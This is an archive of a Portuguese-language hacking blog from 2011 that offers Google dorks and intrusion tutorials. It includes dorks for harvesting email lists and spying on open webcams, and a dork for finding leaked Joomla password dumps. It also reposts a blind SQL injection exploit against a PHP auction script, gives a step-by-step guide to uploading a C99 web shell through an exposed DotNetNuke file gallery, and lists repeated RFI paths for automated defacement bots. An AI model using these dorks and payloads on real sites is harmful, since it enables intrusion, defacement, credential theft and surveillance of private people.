Mostrando postagens com marcador string. Mostrar todas as postagens
Mostrando postagens com marcador string. Mostrar todas as postagens
domingo, 20 de fevereiro de 2011
Scanner SQLI online feito pelo grupo HCV
Scanner SQLI online feito pelo grupo HCV, alem de scan ele ja testa as vull utilizando tecnicas sql injection espero que que gostem vou colocar um scan online com strins especiais para ele, bom scan.
Programa Scanner de vulnerabilidade em Joomla CMS
JOOMLA SECURITY SCANNER
Aé vai um programa scanner que varre vulnnerabilidades de sites feitos em joomla ,segui o link logo abaixo
quarta-feira, 16 de fevereiro de 2011
Capturando lista de email em base csv.
Creia uma Dork para procura de List-mail em bases csv dentro de site,
abaixo segui uma introdução sobre o que é CSV
abaixo segui uma introdução sobre o que é CSV
Comma-separated values (CSV), em português Valores Separados por Vírgula, é um formato de arquivo que armazena dados tabelados, cujo grande uso data da época dos mainframes. Por serem bastante simples, arquivos
.csv
são comuns em todas as plataformas de computador.O CSV é um implementação particular de arquivos de texto separados por um delimitador, que usa a vírgula e a quebra de linha para separar os valores. O formato também usa as aspas em campos no qual são usados os caracteres reservados (vírgula e quebra de linha). Essa robustez no formato torna o CSV mais amplo que outros formatos digitais do mesmo segmento.
Especificação
Embora não exista uma especificação formal do formato CSV, o RFC 4180 descreve um formato comum e estabelece
text/csv
como um tipo MIME registrado na IANA. Formalmente, o CSV é um formato de dados delimitado que possui campos (colunas) separados por caracteres de vírgula e registros (linhas) separados por caracteres de quebra de linha. Campos que contêm caracteres especiais (vírgula, quebra de linha ou aspas) devem ser envolvidos em aspas. Entretanto, se uma linha contiver uma única entrada que seja uma cadeia vazia, ela também pode ser envolvida por aspas. Se um campo contiver um caractere de aspas, ele é discernido posicionando outro caractere igual logo em seguida. O formato CSV não requisita uma codificação de caracteres, uma ordenação de bytes ou um formato de terminador de linha.Exemplo
1997 | Ford | E350 | ac, abs, moon | 3000.00 |
1999 | Chevy | Venture "Extended Edition" | 4900.00 | |
1996 | Jeep | Grand Cherokee | MUST SELL! air, moon roof, loaded | 4799.00 |
1997,Ford,E350,"ac, abs, moon",3000.00 1999,Chevy,"Venture ""Extended Edition""",,4900.00 1996,Jeep,Grand Cherokee,"MUST SELL! air, moon roof, loaded",4799.00
------------------------------------------------------------------------------------------------------------
Quantidade:Aproximadamente 1 stringAutor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código de pesquisa:
+@ +intext:(*mail*) +hotmail +br ext:csv
terça-feira, 25 de janeiro de 2011
Busca de webcans online
Fiz essa string para aqueles que gostam de fuçar a vida do próximo com esse código de busca temos acesso á Aproximadamente 79.900 resultados (0,31 segundos), em nossa busca exclusão de site que contenham o termo hack,hacker,crack, assim nossa busca fica mais limpa e objetiva.
+inurl:/control/userimage.html -blog -hack -hacker -crack
Quantidade:1 string Autor:Cleiton Pinheiro Fonte:blog.inurl.com.brCódigo:
+inurl:/control/userimage.html -blog -hack -hacker -crack
String para buscar proxy uma lista
Proxy é um servidor que atende a requisições repassando os dados do cliente à frente. Um usuário (cliente) conecta-se a um servidor proxy, requisitando algum serviço, como um arquivo, conexão, website, ou outro recurso disponível em outro servidor.
Um servidor proxy pode, opcionalmente, alterar a requisição do cliente ou a resposta do servidor e, algumas vezes, pode disponibilizar este recurso sem nem mesmo se conectar ao servidor especificado. Pode também atuar como um servidor que armazena dados em forma de cache em redes de computadores. São instalados em máquinas com ligações tipicamente superiores às dos clientes e com poder de armazenamento elevado.
Esses servidores têm uma série de usos, como filtrar conteúdo, providenciar anonimato, entre outros.
Um HTTP caching proxy, por exemplo, permite que o cliente requisite um documento na World Wide Web e o proxy procura pelo documento em seu cache. Se encontrado, o documento é retornado imediatamente. Caso contrário, o proxy busca o documento no servidor remoto, entrega-o ao cliente e salva uma cópia no seu cache. Isso permite uma diminuição na latência, já que o servidor proxy, e não o servidor original, é acessado, proporcionando ainda uma redução do uso de banda.
Com isso temos conhecimento da importância de um proxy
criei um dork google pra busca destas listas de proxy disponíveis em sites
String dork
Quantidade:1 string Autor:Cleiton Pinheiro Fonte:blog.inurl.com.br
Código:
+":8080" +":3128" +":80" filetype:txt
Lista de proxy
Dorks para scanner de RFI
Remote File Inclusion (RFI) é um tipo de vulnerabilidade mais freqüentemente encontrados em sites, que permite a um atacante para incluir um arquivo remoto normalmente através de um script no servidor web . The vulnerability occurs due to the use of user supplied input without proper validation. A vulnerabilidade ocorre devido ao uso do produto fornecido a entrada do usuário sem a devida validação. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: Isso pode levar a algo tão mínimo como saída o conteúdo do arquivo, mas dependendo da gravidade, para listar alguns, pode levar a:
- Code execution on the web server A execução de código no servidor web
- Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS). A execução de código no lado do cliente , tais como o Javascript , que pode levar a outros ataques, tais como "cross site scripting (XSS).
- Denial of Service (DoS) Denial of Service (DoS)
- Data Theft /Manipulation O roubo de dados / Manipulação
Strings de RFI - INJECTION uma pequena lista dorks
Quantidade:Aproximadamente 596strings Autor:Desconhecido Fonte:goo.gl/5IPJM
domingo, 23 de janeiro de 2011
String google Acessando arquivo .SQL de sites em joomla
Com os termos de pesquisa "+joomla +login +user +admin +pass" o google faz uma varredura atrás dos mesmo, tabelas de usuários;administradores;senhas são nosso alvo principal. geralmente as senhas de users são criptografadas com MD5 , Por isso recomendo alguns sites para descriptografia de senhas.
Quantidade:Aproximadamente 1 stringAutor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código:
+joomla +login|+user|+admin +pass ext:sql
Lista de Dork para Scanner de vulnerabilidade Joomla
Joomla! (pronuncia-se djumla) é um Sistema de gestão de conteúdos (Content Management System - CMS) desenvolvido a partir do CMS Mambo. É desenvolvido em PHP e pode ser executado no servidor Web Apache ou IIS e base de dados MySQL.
É um projeto de código aberto (licença GNU/GPL) e a sua última versão estável é a 1.5.21 (em 08 de Outubro de 2010); a sua última versão legada é a 1.0.15. O Joomla! é uma ferramenta de CMS muito poderosa, tendo recebido o "Linux Awards".
Lista de Dork para Scanner de vulnerabilidade Joomla
Quantidade:Aproximadamente 61 strings
Autor:Desconhecido
Fonte:Desconhecido
É um projeto de código aberto (licença GNU/GPL) e a sua última versão estável é a 1.5.21 (em 08 de Outubro de 2010); a sua última versão legada é a 1.0.15. O Joomla! é uma ferramenta de CMS muito poderosa, tendo recebido o "Linux Awards".
Lista de Dork para Scanner de vulnerabilidade Joomla
Quantidade:Aproximadamente 61 strings
Autor:Desconhecido
Fonte:Desconhecido
Strings de SQL - INJECTION
Structured Query Language, ou Linguagem de Consulta Estruturada ou SQL, é uma linguagem de pesquisa declarativa para banco de dados relacional (base de dados relacional). Muitas das características originais do SQL foram inspiradas na álgebra relacional.
O SQL foi desenvolvido originalmente no início dos anos 70 nos laboratórios da IBM em San Jose, dentro do projeto System R, que tinha por objetivo demonstrar a viabilidade da implementação do modelo relacional proposto por E. F. Codd. O nome original da linguagem era SEQUEL, acrônimo para "Structured English Query Language" (Linguagem de Consulta Estruturada em Inglês) [1], vindo daí o facto de, até hoje, a sigla, em inglês, ser comumente pronunciada "síquel" ao invés de "és-kiú-él", letra a letra. No entanto, em português, a pronúncia mais corrente é a letra a letra: "ésse-quê-éle".
A linguagem SQL é um grande padrão de banco de dados. Isto decorre da sua simplicidade e facilidade de uso. Ela se diferencia de outras linguagens de consulta a banco de dados no sentido em que uma consulta SQL especifica a forma do resultado e não o caminho para chegar a ele. Ela é uma linguagem declarativa em oposição a outras linguagens procedurais. Isto reduz o ciclo de aprendizado daqueles que se iniciam na linguagem.
O SQL foi desenvolvido originalmente no início dos anos 70 nos laboratórios da IBM em San Jose, dentro do projeto System R, que tinha por objetivo demonstrar a viabilidade da implementação do modelo relacional proposto por E. F. Codd. O nome original da linguagem era SEQUEL, acrônimo para "Structured English Query Language" (Linguagem de Consulta Estruturada em Inglês) [1], vindo daí o facto de, até hoje, a sigla, em inglês, ser comumente pronunciada "síquel" ao invés de "és-kiú-él", letra a letra. No entanto, em português, a pronúncia mais corrente é a letra a letra: "ésse-quê-éle".
A linguagem SQL é um grande padrão de banco de dados. Isto decorre da sua simplicidade e facilidade de uso. Ela se diferencia de outras linguagens de consulta a banco de dados no sentido em que uma consulta SQL especifica a forma do resultado e não o caminho para chegar a ele. Ela é uma linguagem declarativa em oposição a outras linguagens procedurais. Isto reduz o ciclo de aprendizado daqueles que se iniciam na linguagem.
Strings de SQL - INJECTION uma pequena lista dorks
Quantidade:Aproximadamente 127 strings Autor:Desconhecido Fonte:Desconhecido
Ação PHP (viewfaqs.php) Tem Vulnerabilidade a Blind SQL Injection
Vulnerabilidade divulgada Data: 2011/01/21Divulgada pelos grupos: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
Exploit Code :
==
[#]Script: PHP auctions
[#]Version: n/a
[#]Link: http://phpauctions.info
==
[#]Author: BorN To K!LL - h4ck3r
==
[#]3xploit:
/viewfaqs.php?cat=[Blind-Injection]
[#]3xample:
/viewfaqs.php?cat=2 and substring(version(),1,1)=4 // false ,,
/viewfaqs.php?cat=2 and substring(version(),1,1)=5 // true ,,
Assim temos acesso a versão do DB do site
==
[#]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==
Código de busca google:
inurl:/viewfaqs.php?cat=2
Fonte:goo.gl/I6ayE
Scanneando com strings google e Invadindo site

Com esse tutorial simples é rápido vamos aprender como fazer upload em sites rapidamente e depois ter acesso
Etapa 01 -
Acesse o www.google.com.br
Etapa 02 -
A busca use o código de pesquisa sabiamente.
Procure pelo seguinte termo
Código:
inurl:/tabid/36/language/en-US/Default.aspx
Etapa 03 -
Com a busca efetuada Aproximadamente 582 resultados (0,25 segundos) escolha um site de sua preferencia,
e substitua o termo "/tabid/36/language/en-US/Default.aspx" por,
Código:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Exemplo:
www.site.com.br/tabid/36/language/en-US/Default.aspx -01
www.site.com.br/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx -02
Etapa 04 -Você vai ter um link page.So Gallary onde pode criar urls para dentro dos site
Etapa 05 -Não faça nada por enquanto, abordando fase final.
"A caixa e parecida com essa."
Etapa 05 -Não faça nada por enquanto, abordando fase final.
"A caixa e parecida com essa."
Agora substitua a URL na barra de endereços com um simples script
"delete o endereço do site e cole o código abaixo"
"delete o endereço do site e cole o código abaixo"
Código:
javascript:__doPostBack('ctlURL$cmdUpload','')
"Depois do script inserido na barra de endereços a caixa fica assim"
Etapa 07 -
Você vai encontrar a opção de Upload
Etapa 08 -
Etapa 08 -
Selecione Raiz
Etapa 09 -
OBS: todos esse processos foram feitos para que entenda como funciona
podemos ir deireto á fonte também.
Código:
intext:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
ou
Código:
*Fck/fcklinkgallery.aspx
ou
Código:
intitle:"Link Gallery" +fcklinkgallery ext:aspx
Etapa 09 -
Envie seu pacote de Seu Shell C99, C100 etc..
OBS: todos esse processos foram feitos para que entenda como funciona
podemos ir deireto á fonte também.
Código:
intext:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
ou
Código:
*Fck/fcklinkgallery.aspx
ou
Código:
intitle:"Link Gallery" +fcklinkgallery ext:aspx
sábado, 22 de janeiro de 2011
Procurando por vulnerabilidade no sistema de forums Vbulletin
Este resumo não está disponível.
Clique aqui para ver a postagem.
Strings para scanner # SQL Injection Dork List #
# SQL Injection Dork List #
SQL Injection ou injeção de SQL é uma técnica de invasão de sistemas que se tornou famosa na Internet, mas pode ser utilizada em qualquer linguagem de programação. No entanto, na Internet temos uma combinação explosiva: - A aplicação está acessível para toda internet que possui milhares de usuários dispostos a quebrar seu sistema;
- O uso de linguagens de script fracamente tipadas em conjunto com com tipos de dados fracamente tipados ajuda a abrir algumas brexas de segurança.
- O protocolo HTTP tem peculiaridades que quando mal utilizadas podem tornar uma aplicação web mais vulnerável como o uso de parâmetros GET.
Mais conceito
site:.gov.br +sql +error inurl:"id="
index.php?option=com_mambads
inurl:index.php?option=com_expose
intitle:guestbook "advanced guestbook 2.2 powered"
filetype:asp inurl:"shopdisplayproducts.asp
"Powered by: vBulletin * 3.0.1" inurl:newreply.php
"Powered by Invision Power Board(U) v1.3 Final"
inurl:gotoURL.asp?url=
inurl:comersus_message.asp
ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
inurl:"dispatch.php?atknodetype" | inurl:class.at
"Powered by Gallery v1.4.4"
inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca
inurl:"/becommunity/community/index.php?pageurl="
"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
filetype:cgi inurl:tseekdir.cgi
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle: Index of finance.xls
intitle:index.of passwd passwd.bak
allinurl:loc_id "mod.php?mod=calendar"
allinurl:"mod php mod publisher"artid
allinurl:"mod.php?mod=gallery" id
Programa scanner dork php - sql injection rfi
DorkTools Versão 5.0 é um programa simples para procurar vulneráveis na Internet usando google consulta.
Feito em VB 6.0, já vem com uma biblioteca de strings com fonte em txt, que pode ser alterada de acordo com as necessidades do usuário.
[=] Resultado mais fresco
[=] Não precisa MSINET.OCX
[=] Não precisa Mscomctl.ocx
[=] Não precisa DLL
Baixar: goo.gl/uAHBl
Uma lista Strins de pesquisa para busca de vulnerabilidades á php injection
Uma lista Strings de pesquisa para busca de vulnerabilidades á php injection
As strings abaixo são direcionadas para scanners RFI - defaces que gostam de um bom scan em ssh rodar aquele velho bot-scanner testar se é safe off! ou safe on! vai gostar das strings á seguir acompanhadas de seus respectivos dorks dando um auxilio para bot encontrar seu site vul.
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-----------------------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"minibb\"
CODE:
components/minibb/index.php?absolute_path=
---------------------------------------------------------------------
Google dork:
inurl:\"com_smf\"
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
CODE:
/modules/mod_calendar.php?absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_pollxt\"
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_loudmounth\"
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
------------------------------------------------------------------------
Google dork:
inurl:\"com_videodb\"
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_multibanners\"
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht Linkleri görebilmek için ÜYE olmalısınız
-----------------------------------------------------------------------
Google dork:
inurl:\"com_a6mambohelpdesk\"
Google dork:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
--------------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
Fonte:goo.gl/cVZve
As strings abaixo são direcionadas para scanners RFI - defaces que gostam de um bom scan em ssh rodar aquele velho bot-scanner testar se é safe off! ou safe on! vai gostar das strings á seguir acompanhadas de seus respectivos dorks dando um auxilio para bot encontrar seu site vul.
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-----------------------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"minibb\"
CODE:
components/minibb/index.php?absolute_path=
---------------------------------------------------------------------
Google dork:
inurl:\"com_smf\"
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
CODE:
/modules/mod_calendar.php?absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_pollxt\"
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_loudmounth\"
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
------------------------------------------------------------------------
Google dork:
inurl:\"com_videodb\"
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_multibanners\"
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht Linkleri görebilmek için ÜYE olmalısınız
-----------------------------------------------------------------------
Google dork:
inurl:\"com_a6mambohelpdesk\"
Google dork:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
--------------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
--------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
Fonte:goo.gl/cVZve
sexta-feira, 21 de janeiro de 2011
Opções avançadas de pesquisa Bing - Microsoft
Símbolo | Função |
---|---|
+ | Localiza páginas da Web que contenham todos os termos precedidos pelo símbolo +. Também permite incluir termos que normalmente são ignorados. |
" " | Localiza as palavras exatas em uma frase. |
() | Localiza ou exclui páginas da Web que contenham um grupo de palavras. |
E ou & | Localiza páginas da Web que contenham todos os termos ou frases. |
NÃO ou - | Exclui páginas da Web que contenham um termo ou uma frase. |
OU ou | | Localiza páginas da Web que contenham um dos termos ou frases. |
![]() |
---|
|
Fonte:goo.gl/Jb4Ck
Operadores de busca avançada do BING - Microsoft
Palavras-chave de pesquisa avançada
O bing sistema de busca da Microsoft dispõe de operadores avançados.
O bing sistema de busca da Microsoft dispõe de operadores avançados.
Deseja perder menos tempo selecionando entre resultados irrelevantes? Palavras-chave avançadas podem fornecer resultados de pesquisa mais precisos, permitindo que você encontre apenas o que deseja. Use as seguintes palavras-chave para ajudar a limitar e focalizar suas pesquisas:
Palavra-chave | Definição | Exemplo |
---|---|---|
contains: | Mantém os resultados focalizados em sites que possuem links para os tipos de arquivo especificados. | Para procurar sites que contenham links para arquivos Microsoft Windows Media Audio (.wma), digite música contains:wma. |
filetype: | Retorna apenas páginas da Web criadas no tipo de arquivo especificado. | Para localizar relatórios criados no formato PDF, digite o assunto seguido de filetype:pdf. |
inanchor: ou inbody: ou intitle: | Estas palavras-chave retornam páginas da Web que contêm o termo especificado nos metadados, como âncora, corpo ou título do site, respectivamente. Especifique somente um termo por palavra-chave. É possível utilizar várias entradas de palavras-chave, se necessário. | Para localizar páginas da Web que contenham msn na âncora e os termos spaces e magog no corpo, digite inanchor:msn inbody:spaces inbody:magog. |
ip: | Localiza sites hospedados por um endereço IP específico. O endereço IP deve ser um endereço quad com pontos. Digite a palavra-chave IP: seguida do endereço IP do site. | Digite IP:207.46.249.252. |
language: | Retorna páginas da Web para um idioma específico. Especifique o código do idioma logo após a palavra-chave idioma:. Também é possível acessar essa função usando a função Idioma do Construtor de Pesquisas. Para obter mais informações sobre como usar o Construtor de Pesquisas, consulte Usar a pesquisa avançada. | Para ver páginas da Web apenas em inglês sobre antigüidades, digite "antigüidades" language:en. |
loc: ou location: | Retorna páginas da Web de um determinado país ou região. Especifique o país ou a região logo após a palavra-chave loc:. Para focalizar em dois ou mais idiomas, use um operador lógico OU para agrupar os idiomas. | Para ver páginas da Web sobre esculturas dos EUA ou da Grã-Bretanha, digite escultura (loc:US OU loc:GB). Para ver uma lista dos códigos de idioma que podem ser usados com o Bing, consulte País, região e códigos de idioma. |
prefer: | Coloca ênfase em um termo de pesquisa ou em outro operador para ajudar a focalizar os resultados da pesquisa. | Para localizar resultados sobre futebol, mas que, antes de mais nada, pertencem à organização, digite futebol prefer:organização. |
site: | Retorna páginas da Web que pertencem ao site especificado. Para focalizar em dois ou mais domínios, use o operador lógico OU para agrupar os domínios. Você pode usar site: para procurar domínios da Web, domínios de nível superior e diretórios com até dois níveis. Também é possível pesquisar páginas da Web que contenham uma determinada palavra de pesquisa em um site. | Para ver páginas da Web sobre doenças do coração no site da BBC ou da CNN, digite "doenças do coração" (site:bbc.co.uk OU site:cnn.com). Para localizar páginas da Web sobre a versão para PC do Halo no site da Microsoft, digite site:www.microsoft.com/games/pc halo. |
feed: | Localiza RSS ou Atom feeds em um site sobre os termos que você está pesquisando. | Para localizar RSS feeds ou Atom feeds sobre futebol, digite feed:futebol. |
hasfeed: | Localiza páginas da Web que contenham um RSS feed ou Atom feed em um site sobre os termos que você está pesquisando. | Para localizar páginas da Web no site do New York Times que contenham RSS ou Atom feeds, digite site:www.nytimes.com hasfeed:futebol. |
